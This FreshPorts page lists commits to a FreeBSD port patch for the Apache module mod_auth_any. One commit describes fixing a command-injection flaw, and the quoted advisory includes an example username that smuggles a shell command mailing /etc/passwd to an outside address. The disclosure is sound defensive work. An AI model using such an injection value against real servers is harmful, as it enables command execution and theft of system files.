notbugAs an Amazon Associate I earn from qualifying purchases.
Want a good read? Try FreeBSD Mastery: Jails (IT Mastery Book 15)Want a good monitor light? See my photosAll times are UTC		 Ukraine
This referral link gives you 10% off a Fastmail.com account and gives me a discount on my Fastmail account.

Get notified when packages are built

A new feature has been added. FreshPorts already tracks package built by the FreeBSD project. This information is displayed on each port page. You can now get an email when FreshPorts notices a new package is available for something on one of your watch lists. However, you must opt into that. Click on Report Subscriptions on the right, and New Package Notification box, and click on Update.

Finally, under Watch Lists, click on ABI Package Subscriptions to select your ABI (e.g. FreeBSD:14:amd64) & package set (latest/quarterly) combination for a given watch list. This is what FreshPorts will look for.

non port: www/mod_auth_any/files/patch-mod_auth_any.c

Number of commits found: 2

Monday, 6 Oct 2003
13:00 edwin search for other commits by this committer 
[update orphand port] www/mod_auth_any: Update to 1.3.2 and take maintainership

        - update to 1.3.2
        - update WWW
        - take maintainership

PR:             ports/57413
Submitted by:   Clement Laforet <sheepkiller@cultdeadsheep.org>
Original commit
Tuesday, 25 Mar 2003
04:23 lioux search for other commits by this committer 
o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:  mod_auth_any CVS [2],
                nalin@redhat.com [3]
Original commit

Number of commits found: 2
Login
User Login
Create account

Servers and bandwidth provided by
New York Internet, iXsystems, and RootBSD

This site
What is FreshPorts?
About the authors
Issues
FAQ
How big is it?
Security Policy
Privacy
Blog
Contact

Search
Enter Keywords:
 
more...

Latest Vulnerabilities
gitlabApr 24
py-matrix-synapseApr 24
ruby31Apr 23
ruby32Apr 23
ruby33Apr 23
glpiApr 22
glpiApr 22
glpiApr 22
sdl2_soundApr 22
chromiumApr 21
ungoogled-chromiumApr 21
clamavApr 19
jenkinsApr 19
jenkins-ltsApr 19
electron27Apr 18

21 vulnerabilities affecting 286 ports have been reported in the past 14 days

* - modified, not new

All vulnerabilities

Last processed:
2024-04-24 21:00:48 UTC


Ports
Home
Categories
Deleted ports
Sanity Test Failures
Newsfeeds

Statistics
Graphs
NEW Graphs (Javascript)

Calculated hourly:
Port count 32219
Broken 85
Deprecated 178
Ignore 217
Forbidden 2
Restricted 2
No CDROM 1
Vulnerable 41
Expired 6
Set to expire 152
Interactive 0
new 24 hours 5
new 48 hours6
new 7 days20
new fortnight27
new month126
Servers and bandwidth provided by
New York Internet, iXsystems, and RootBSD 		Valid HTML, CSS, and RSS. Copyright © 2000-2024 Dan Langille. All rights reserved.